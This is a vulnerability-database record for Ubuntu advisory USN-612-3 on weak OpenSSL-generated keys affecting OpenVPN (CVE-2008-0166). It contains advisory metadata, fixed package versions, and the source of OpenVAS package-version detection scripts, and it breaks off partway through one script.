ID USN-612-3 Type ubuntu Reporter Ubuntu Modified 2008-05-13T00:00:00
Description
A weakness has been discovered in the random number generator used by OpenSSL on Debian and Ubuntu systems. As a result of this weakness, certain encryption keys are much more common than they should be, such that an attacker could guess the key through a brute-force attack given minimal knowledge of the system. This particularly affects the use of shared encryption keys and SSL/TLS certificates in OpenVPN.
This vulnerability only affects operating systems which (like Ubuntu) are based on Debian. However, other systems can be indirectly affected if weak keys are imported into them.
We consider this an extremely serious vulnerability, and urge all users to act immediately to secure their systems.
{"id": "USN-612-3", "bulletinFamily": "unix", "title": "OpenVPN vulnerability", "description": "A weakness has been discovered in the random number generator used by OpenSSL on Debian and Ubuntu systems. As a result of this weakness, certain encryption keys are much more common than they should be, such that an attacker could guess the key through a brute-force attack given minimal knowledge of the system. This particularly affects the use of shared encryption keys and SSL/TLS certificates in OpenVPN.\n\nThis vulnerability only affects operating systems which (like Ubuntu) are based on Debian. However, other systems can be indirectly affected if weak keys are imported into them.\n\nWe consider this an extremely serious vulnerability, and urge all users to act immediately to secure their systems.", "published": "2008-05-13T00:00:00", "modified": "2008-05-13T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "https://usn.ubuntu.com/612-3/", "reporter": "Ubuntu", "references": ["http://www.ubuntu.com/usn/usn-612-1", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-0166", "https://usn.ubuntu.com/usn/usn-612-1"], "cvelist": ["CVE-2008-0166"], "type": "ubuntu", "lastseen": "2019-05-29T17:23:30", "history": [{"bulletin": {"affectedPackage": [{"OS": "Ubuntu", "OSVersion": "7.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "openvpn", "packageVersion": "2.0.9-5ubuntu0.1"}, {"OS": "Ubuntu", "OSVersion": "8.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "openvpn", "packageVersion": "2.1~rc7-1ubuntu3.1"}, {"OS": "Ubuntu", "OSVersion": "7.10", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "openvpn", "packageVersion": "2.0.9-8ubuntu0.1"}], "bulletinFamily": "unix", "cvelist": ["CVE-2008-0166"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "A weakness has been discovered in the random number generator used by OpenSSL on Debian and Ubuntu systems. As a result of this weakness, certain encryption keys are much more common than they should be, such that an attacker could guess the key through a brute-force attack given minimal knowledge of the system. This particularly affects the use of shared encryption keys and SSL/TLS certificates in OpenVPN.\n\nThis vulnerability only affects operating systems which (like Ubuntu) are based on Debian. However, other systems can be indirectly affected if weak keys are imported into them.\n\nWe consider this an extremely serious vulnerability, and urge all users to act immediately to secure their systems.", "edition": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "d7600e4d07a62f627e16c7bdaaf3b763f4e90171758ec444bd9ef54bc0c6fcf7", "hashmap": [{"hash": "fa189ef427f2047c62b78541b5c5b1f2", "key": "description"}, {"hash": "8c90638a15abee558415080c290ce3d8", "key": "references"}, {"hash": "5ee4aeacdb5399f498969b1ee11dd5c1", "key": "modified"}, {"hash": "c270bbaaddbda1a2375f5cf2ed389342", "key": "cvelist"}, {"hash": "103a3418de596b30a831867b80c0d7a8", "key": "affectedPackage"}, {"hash": "5ee4aeacdb5399f498969b1ee11dd5c1", "key": "published"}, {"hash": "87f6cf7a91d1f6a58f34a60f6162726b", "key": "href"}, {"hash": "1d41c853af58d3a7ae54990ce29417d8", "key": "type"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "4913a9178621eadcdf191db17915fbcb", "key": "bulletinFamily"}, {"hash": "3d945423f8e9496c429a5d8c65b4604f", "key": "reporter"}, {"hash": "b70d51516ba81bc8fc427774478a0683", "key": "title"}], "history": [], "href": "https://usn.ubuntu.com/612-3/", "id": "USN-612-3", "lastseen": "2018-08-30T20:07:53", "modified": "2008-05-13T00:00:00", "objectVersion": "1.3", "published": "2008-05-13T00:00:00", "references": ["http://www.ubuntu.com/usn/usn-612-1", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-0166", "https://usn.ubuntu.com/usn/usn-612-1"], "reporter": "Ubuntu", "title": "OpenVPN vulnerability", "type": "ubuntu", "viewCount": 0}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2018-08-30T20:07:53"}, {"bulletin": {"affectedPackage": [{"OS": "Ubuntu", "OSVersion": "7.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "openvpn", "packageVersion": "2.0.9-5ubuntu0.1"}, {"OS": "Ubuntu", "OSVersion": "8.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "openvpn", "packageVersion": "2.1~rc7-1ubuntu3.1"}, {"OS": "Ubuntu", "OSVersion": "7.10", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "openvpn", "packageVersion": "2.0.9-8ubuntu0.1"}], "bulletinFamily": "unix", "cvelist": ["CVE-2008-0166"], "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "description": "A weakness has been discovered in the random number generator used by OpenSSL on Debian and Ubuntu systems. As a result of this weakness, certain encryption keys are much more common than they should be, such that an attacker could guess the key through a brute-force attack given minimal knowledge of the system. This particularly affects the use of shared encryption keys and SSL/TLS certificates in OpenVPN.\n\nThis vulnerability only affects operating systems which (like Ubuntu) are based on Debian. However, other systems can be indirectly affected if weak keys are imported into them.\n\nWe consider this an extremely serious vulnerability, and urge all users to act immediately to secure their systems.", "edition": 3, "enchantments": {"dependencies": {"modified": "2018-08-31T00:10:18", "references": [{"idList": ["USN-612-7", "USN-612-1", "USN-612-4", "USN-612-2"], "type": "ubuntu"}, {"idList": ["DEBIAN:DSA-1576-2:E7258", "DEBIAN:DSA-1576-1:61216", "DEBIAN:DSA-1571-1:611C4"], "type": "debian"}, {"idList": ["SECURITYVULNS:DOC:19843", "SECURITYVULNS:DOC:19844", "SECURITYVULNS:VULN:8994"], "type": "securityvulns"}, {"idList": ["CVE-2008-0166"], "type": "cve"}, {"idList": ["VU:925211"], "type": "cert"}, {"idList": ["OPENVAS:1361412562310105497", "OPENVAS:840271", "OPENVAS:61029", "OPENVAS:840338", "OPENVAS:840268", "OPENVAS:61027", "OPENVAS:136141256231090025", "OPENVAS:90025", "OPENVAS:61030", "OPENVAS:840286"], "type": "openvas"}, {"idList": ["AVLEONOV:54F79F8B5C71E738DB16AEA2DF8FFD2F"], "type": "avleonov"}, {"idList": ["DEBIAN_DSA-1576.NASL", "UBUNTU_USN-612-2.NASL", "SSH_DEBIAN_WEAK.NASL", "UBUNTU_USN-612-7.NASL", "DEBIAN_DSA-1571.NASL", "SSL_DEBIAN_WEAK.NASL", "SSH_DEBIAN_FIND_WEAK_KEYS.NASL", "UBUNTU_USN-612-3.NASL", "UBUNTU_USN-612-4.NASL", "UBUNTU_USN-612-1.NASL"], "type": "nessus"}, {"idList": ["EDB-ID:5720"], "type": "exploitdb"}]}, "score": {"value": 5.0, "vector": "NONE"}}, "hash": "66876da60eb9d5824758e862a7a6f8b6fad592c52966f24bc42199e807ee2d40", "hashmap": [{"hash": "fa189ef427f2047c62b78541b5c5b1f2", "key": "description"}, {"hash": "8c90638a15abee558415080c290ce3d8", "key": "references"}, {"hash": "5ee4aeacdb5399f498969b1ee11dd5c1", "key": "modified"}, {"hash": "c270bbaaddbda1a2375f5cf2ed389342", "key": "cvelist"}, {"hash": "103a3418de596b30a831867b80c0d7a8", "key": "affectedPackage"}, {"hash": "313104e31e57b9f7aa405f5f0fc56a4e", "key": "cvss"}, {"hash": "5ee4aeacdb5399f498969b1ee11dd5c1", "key": "published"}, {"hash": "87f6cf7a91d1f6a58f34a60f6162726b", "key": "href"}, {"hash": "1d41c853af58d3a7ae54990ce29417d8", "key": "type"}, {"hash": "4913a9178621eadcdf191db17915fbcb", "key": "bulletinFamily"}, {"hash": "3d945423f8e9496c429a5d8c65b4604f", "key": "reporter"}, {"hash": "b70d51516ba81bc8fc427774478a0683", "key": "title"}], "history": [], "href": "https://usn.ubuntu.com/612-3/", "id": "USN-612-3", "lastseen": "2018-08-31T00:10:18", "modified": "2008-05-13T00:00:00", "objectVersion": "1.3", "published": "2008-05-13T00:00:00", "references": ["http://www.ubuntu.com/usn/usn-612-1", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-0166", "https://usn.ubuntu.com/usn/usn-612-1"], "reporter": "Ubuntu", "title": "OpenVPN vulnerability", "type": "ubuntu", "viewCount": 0}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-31T00:10:18"}, {"bulletin": {"affectedPackage": [{"OS": "Ubuntu", "OSVersion": "7.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "openvpn", "packageVersion": "2.0.9-5ubuntu0.1"}, {"OS": "Ubuntu", "OSVersion": "8.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "openvpn", "packageVersion": "2.1~rc7-1ubuntu3.1"}, {"OS": "Ubuntu", "OSVersion": "7.10", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "openvpn", "packageVersion": "2.0.9-8ubuntu0.1"}], "bulletinFamily": "unix", "cvelist": ["CVE-2008-0166"], "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "description": "A weakness has been discovered in the random number generator used by OpenSSL on Debian and Ubuntu systems. As a result of this weakness, certain encryption keys are much more common than they should be, such that an attacker could guess the key through a brute-force attack given minimal knowledge of the system. This particularly affects the use of shared encryption keys and SSL/TLS certificates in OpenVPN.\n\nThis vulnerability only affects operating systems which (like Ubuntu) are based on Debian. However, other systems can be indirectly affected if weak keys are imported into them.\n\nWe consider this an extremely serious vulnerability, and urge all users to act immediately to secure their systems.", "edition": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "66876da60eb9d5824758e862a7a6f8b6fad592c52966f24bc42199e807ee2d40", "hashmap": [{"hash": "fa189ef427f2047c62b78541b5c5b1f2", "key": "description"}, {"hash": "8c90638a15abee558415080c290ce3d8", "key": "references"}, {"hash": "5ee4aeacdb5399f498969b1ee11dd5c1", "key": "modified"}, {"hash": "c270bbaaddbda1a2375f5cf2ed389342", "key": "cvelist"}, {"hash": "103a3418de596b30a831867b80c0d7a8", "key": "affectedPackage"}, {"hash": "313104e31e57b9f7aa405f5f0fc56a4e", "key": "cvss"}, {"hash": "5ee4aeacdb5399f498969b1ee11dd5c1", "key": "published"}, {"hash": "87f6cf7a91d1f6a58f34a60f6162726b", "key": "href"}, {"hash": "1d41c853af58d3a7ae54990ce29417d8", "key": "type"}, {"hash": "4913a9178621eadcdf191db17915fbcb", "key": "bulletinFamily"}, {"hash": "3d945423f8e9496c429a5d8c65b4604f", "key": "reporter"}, {"hash": "b70d51516ba81bc8fc427774478a0683", "key": "title"}], "history": [], "href": "https://usn.ubuntu.com/612-3/", "id": "USN-612-3", "lastseen": "2018-03-29T18:20:46", "modified": "2008-05-13T00:00:00", "objectVersion": "1.3", "published": "2008-05-13T00:00:00", "references": ["http://www.ubuntu.com/usn/usn-612-1", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-0166", "https://usn.ubuntu.com/usn/usn-612-1"], "reporter": "Ubuntu", "title": "OpenVPN vulnerability", "type": "ubuntu", "viewCount": 0}, "differentElements": ["cvss"], "edition": 1, "lastseen": "2018-03-29T18:20:46"}], "edition": 4, "hashmap": [{"key": "affectedPackage", "hash": "103a3418de596b30a831867b80c0d7a8"}, {"key": "bulletinFamily", "hash": "4913a9178621eadcdf191db17915fbcb"}, {"key": "cvelist", "hash": "c270bbaaddbda1a2375f5cf2ed389342"}, {"key": "cvss", "hash": "0ec1bc5905eebdadd4aa4f0764cc4720"}, {"key": "description", "hash": "fa189ef427f2047c62b78541b5c5b1f2"}, {"key": "href", "hash": "87f6cf7a91d1f6a58f34a60f6162726b"}, {"key": "modified", "hash": "5ee4aeacdb5399f498969b1ee11dd5c1"}, {"key": "published", "hash": "5ee4aeacdb5399f498969b1ee11dd5c1"}, {"key": "references", "hash": "8c90638a15abee558415080c290ce3d8"}, {"key": "reporter", "hash": "3d945423f8e9496c429a5d8c65b4604f"}, {"key": "title", "hash": "b70d51516ba81bc8fc427774478a0683"}, {"key": "type", "hash": "1d41c853af58d3a7ae54990ce29417d8"}], "hash": "da7a380cf6c9ee44a3d838e6e7c770d8836ee8c0f9798c0f2c3ecdcf27a11e4b", "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-0166"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1576-2:E7258", "DEBIAN:DSA-1571-1:611C4", "DEBIAN:DSA-1576-1:61216"]}, {"type": "nessus", "idList": ["SSL_DEBIAN_WEAK.NASL", "UBUNTU_USN-612-4.NASL", "UBUNTU_USN-612-7.NASL", "SSH_DEBIAN_FIND_WEAK_KEYS.NASL", "DEBIAN_DSA-1576.NASL", "UBUNTU_USN-612-3.NASL", "UBUNTU_USN-612-1.NASL", "DEBIAN_DSA-1571.NASL", "SSH_DEBIAN_WEAK.NASL", "UBUNTU_USN-612-2.NASL"]}, {"type": "ubuntu", "idList": ["USN-612-2", "USN-612-4", "USN-612-7", "USN-612-1"]}, {"type": "openvas", "idList": ["OPENVAS:840268", "OPENVAS:61030", "OPENVAS:840271", "OPENVAS:840338", "OPENVAS:840286", "OPENVAS:136141256231090025", "OPENVAS:90025", "OPENVAS:61029", "OPENVAS:61027", "OPENVAS:1361412562310105497"]}, {"type": "exploitdb", "idList": ["EDB-ID:5720"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:19843", "SECURITYVULNS:DOC:19844", "SECURITYVULNS:VULN:8994"]}, {"type": "cert", "idList": ["VU:925211"]}, {"type": "avleonov", "idList": ["AVLEONOV:54F79F8B5C71E738DB16AEA2DF8FFD2F"]}], "modified": "2019-05-29T17:23:30"}, "score": {"value": 5.9, "vector": "NONE", "modified": "2019-05-29T17:23:30"}, "vulnersScore": 5.9}, "objectVersion": "1.3", "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "7.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "openvpn", "packageVersion": "2.0.9-5ubuntu0.1"}, {"OS": "Ubuntu", "OSVersion": "8.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "openvpn", "packageVersion": "2.1~rc7-1ubuntu3.1"}, {"OS": "Ubuntu", "OSVersion": "7.10", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "openvpn", "packageVersion": "2.0.9-8ubuntu0.1"}], "scheme": null}
{"cve": [{"lastseen": "2019-05-29T18:09:24", "bulletinFamily": "NVD", "description": "OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys.", "modified": "2018-10-15T21:58:00", "id": "CVE-2008-0166", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0166", "published": "2008-05-13T17:20:00", "title": "CVE-2008-0166", "type": "cve", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "openvas": [{"lastseen": "2017-12-04T11:29:52", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-612-2", "modified": "2017-12-01T00:00:00", "published": "2009-03-23T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=840271", "id": "OPENVAS:840271", "title": "Ubuntu Update for openssh vulnerability USN-612-2", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_612_2.nasl 7969 2017-12-01 09:23:16Z santu $\n#\n# Ubuntu Update for openssh vulnerability USN-612-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"1. Install the security updates\n\n Ubuntu 7.04:\n openssh-client 1:4.3p2-8ubuntu1.3\n openssh-server 1:4.3p2-8ubuntu1.3\n \n Ubuntu 7.10:\n openssh-client 1:4.6p1-5ubuntu0.3\n openssh-server 1:4.6p1-5ubuntu0.3\n \n Ubuntu 8.04 LTS:\n openssh-client 1:4.7p1-8ubuntu1.1\n openssh-server 1:4.7p1-8ubuntu1.1\n \n Once the update is applied, weak user keys will be automatically\n rejected where possible (though they cannot be detected in all\n cases). If you are using such keys for user authentication,\n they will immediately stop working and will need to be replaced\n (see step 3).\n \n OpenSSH host keys can be automatically regenerated when the\n OpenSSH security update is applied. The update will prompt for\n confirmation before taking this step.\n \n 2. Update OpenSSH known_hosts files\n \n The regeneration of host keys will cause a warning to be displayed\n when connecting to the system using SSH until the host key is\n updated in the known_hosts file. The warning will look like this:\n \n @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n @ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @\n @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!\n Someone could be eavesdropping on you right now (man-in-the-middle\n attack)! It is also possible that the RSA host key has just been\n changed.\n \n In this case, the host key has simply been changed, and you\n should update the relevant known_hosts file as indicated in the\n error message.\n \n 3. Check all OpenSSH user keys\n \n The safest course of action is to regenerate all OpenSSH user\n keys, except where it can be established to a high degree of\n certainty that the key was generated on an unaffected system.\n \n Check whether your key is affected by running the ssh-vulnkey\n tool, included in the security update. By default, ssh-vulnkey\n will check the standard location for user keys (~/.ssh/id_rsa,\n ~/.ssh/id_dsa and ~/.ssh/identity), your authorized_keys file\n (~/.ssh/authorized_keys and ~/.ssh/authorized_keys2), and the\n system's host keys (/etc/ssh/ssh_host_dsa_key and\n /etc/ssh/ssh_host_rsa_key).\n \n To check all your own keys, assuming they are in the standard\n locations (~/.ssh/id_rsa, ~/.ssh/id_dsa, or ~/.ssh/identity):\n \n $ ssh-vulnkey\n \n To check all keys on your system:\n \n $ sudo ssh-vulnkey -a\n \n To check a key in a non-standard location:\n \n $ ssh-vulnkey /path/to/key\n \n If ssh-vul ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-612-2\";\ntag_solution = \"Please Install the Updated Packages.\";\ntag_affected = \"openssh vulnerability on Ubuntu 7.04 ,\n Ubuntu 7.10 ,\n Ubuntu 8.04 LTS\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-612-2/\");\n script_id(840271);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-23 10:59:50 +0100 (Mon, 23 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_xref(name: \"USN\", value: \"612-2\");\n script_cve_id(\"CVE-2008-0166\");\n script_name( \"Ubuntu Update for openssh vulnerability USN-612-2\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU7.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"openssh-client\", ver:\"4.3p2-8ubuntu1.3\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openssh-server\", ver:\"4.3p2-8ubuntu1.3\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ssh-askpass-gnome\", ver:\"4.3p2-8ubuntu1.3\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ssh\", ver:\"4.3p2-8ubuntu1.3\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ssh-krb5\", ver:\"4.3p2-8ubuntu1.3\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"openssh-client\", ver:\"4.7p1-8ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openssh-server\", ver:\"4.7p1-8ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ssh-askpass-gnome\", ver:\"4.7p1-8ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ssh\", ver:\"4.7p1-8ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ssh-krb5\", ver:\"4.7p1-8ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU7.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"openssh-client\", ver:\"4.6p1-5ubuntu0.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openssh-server\", ver:\"4.6p1-5ubuntu0.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ssh-askpass-gnome\", ver:\"4.6p1-5ubuntu0.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ssh\", ver:\"4.6p1-5ubuntu0.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ssh-krb5\", ver:\"4.6p1-5ubuntu0.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-24T12:49:52", "bulletinFamily": "scanner", "description": "The remote host is missing an update to openssh\nannounced via advisory DSA 1576-2.", "modified": "2017-07-07T00:00:00", "published": "2008-05-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=61030", "id": "OPENVAS:61030", "title": "Debian Security Advisory DSA 1576-2 (openssh)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1576_2.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1576-2 (openssh)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Matt Zimmerman discovered that entries in ~/.ssh/authorized_keys with\noptions (such as no-port-forwarding or forced commands) were ignored by\nthe new ssh-vulnkey tool introduced in openssh 1:4.3p2-9etch1 (see DSA\n1576-1). This could cause some compromised keys not to be listed in\nssh-vulnkey's output.\n\nThis update also adds more information to ssh-vulnkey's manual page.\n\nFor the stable distribution (etch), this problem has been fixed in version\n1:4.3p2-9etch2\n\nWe recommend that you upgrade your openssh (1:4.3p2-9etch2) package.\";\ntag_summary = \"The remote host is missing an update to openssh\nannounced via advisory DSA 1576-2.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201576-2\";\n\n\nif(description)\n{\n script_id(61030);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-05-27 15:41:50 +0200 (Tue, 27 May 2008)\");\n script_cve_id(\"CVE-2008-0166\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_name(\"Debian Security Advisory DSA 1576-2 (openssh)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"ssh-krb5\", ver:\"4.3p2-9etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ssh\", ver:\"4.3p2-9etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ssh-askpass-gnome\", ver:\"4.3p2-9etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssh-client\", ver:\"4.3p2-9etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssh-server\", ver:\"4.3p2-9etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2017-12-04T11:28:30", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-612-7", "modified": "2017-12-01T00:00:00", "published": "2009-03-23T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=840268", "id": "OPENVAS:840268", "title": "Ubuntu Update for openssh update USN-612-7", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_612_7.nasl 7969 2017-12-01 09:23:16Z santu $\n#\n# Ubuntu Update for openssh update USN-612-7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, 